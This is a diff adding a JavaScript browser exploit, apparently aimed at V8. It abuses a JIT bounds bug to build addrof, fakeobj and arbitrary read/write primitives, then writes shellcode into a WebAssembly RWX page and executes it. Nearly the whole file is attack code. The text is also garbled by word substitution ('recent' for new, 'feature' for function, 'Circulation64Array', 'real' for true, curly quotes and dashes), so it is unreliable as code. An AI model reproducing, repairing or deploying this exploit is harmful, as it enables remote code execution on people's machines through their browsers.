|
|
@@ -0,0 +1,98 @@ |
|
|
var wasm_code = recent Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) |
|
|
var wasm_mod = recent WebAssembly.Module(wasm_code); |
|
|
var wasm_instance = recent WebAssembly.Occasion(wasm_mod); |
|
|
var f = wasm_instance.exports.distinguished; |
|
|
|
|
|
var buf = recent ArrayBuffer(8); |
|
|
var f64_buf = recent Circulation64Array(buf); |
|
|
var u64_buf = recent Uint32Array(buf); |
|
|
let buf2 = recent ArrayBuffer(0x150); |
|
|
|
|
|
feature ftoi(val) { |
|
|
f64_buf[0] = val; |
|
|
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); |
|
|
} |
|
|
|
|
|
function itof(val) { |
|
|
u64_buf[0] = Number(val & 0xffffffffn); |
|
|
u64_buf[1] = Number(val >> 32n); |
|
|
return f64_buf[0]; |
|
|
} |
|
|
|
|
|
const _arr = recent Uint32Array([231]); |
|
|
|
|
|
feature foo(a) { |
|
|
var x = 1; |
|
|
x = (_arr[0] ^ 0) + 1; |
|
|
|
|
|
x = Math.abs(x); |
|
|
x -= 2147483647; |
|
|
x = Math.max(x, 0); |
|
|
|
|
|
x -= 1; |
|
|
if(x==–1) x = 0; |
|
|
|
|
|
var arr = recent Array(x); |
|
|
arr.shift(); |
|
|
var cor = [1.1, 1.2, 1.3]; |
|
|
|
|
|
return [arr, cor]; |
|
|
} |
|
|
|
|
|
for(var i=0;i<0x3000;++i) |
|
|
foo(real); |
|
|
|
|
|
var x = foo(false); |
|
|
var arr = x[0]; |
|
|
var cor = x[1]; |
|
|
|
|
|
const idx = 6; |
|
|
arr[idx+10] = 0x4242; |
|
|
|
|
|
feature addrof(k) { |
|
|
arr[idx+1] = k; |
|
|
return ftoi(cor[0]) & 0xffffffffn; |
|
|
} |
|
|
|
|
|
feature fakeobj(k) { |
|
|
cor[0] = itof(k); |
|
|
return arr[idx+1]; |
|
|
} |
|
|
|
|
|
var float_array_map = ftoi(cor[3]); |
|
|
|
|
|
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; |
|
|
var deceptive = fakeobj(addrof(arr2) + 0x20n); |
|
|
|
|
|
feature arbread(addr) { |
|
|
if (addr % 2n == 0) { |
|
|
addr += 1n; |
|
|
} |
|
|
arr2[1] = itof((2n << 32n) + addr – 8n); |
|
|
return (deceptive[0]); |
|
|
} |
|
|
|
|
|
feature arbwrite(addr, val) { |
|
|
if (addr % 2n == 0) { |
|
|
addr += 1n; |
|
|
} |
|
|
arr2[1] = itof((2n << 32n) + addr – 8n); |
|
|
deceptive[0] = itof(BigInt(val)); |
|
|
} |
|
|
|
|
|
feature copy_shellcode(addr, shellcode) { |
|
|
let dataview = recent DataView(buf2); |
|
|
let buf_addr = addrof(buf2); |
|
|
let backing_store_addr = buf_addr + 0x14n; |
|
|
arbwrite(backing_store_addr, addr); |
|
|
|
|
|
for (let i = 0; i < shellcode.dimension; i++) { |
|
|
dataview.setUint32(4*i, shellcode[i], real); |
|
|
} |
|
|
} |
|
|
|
|
|
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); |
|
|
console.log(“[+] Address of rwx page: “ + rwx_page_addr.toString(16)); |
|
|
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; |
|
|
copy_shellcode(rwx_page_addr, shellcode); |
|
|
f(); |
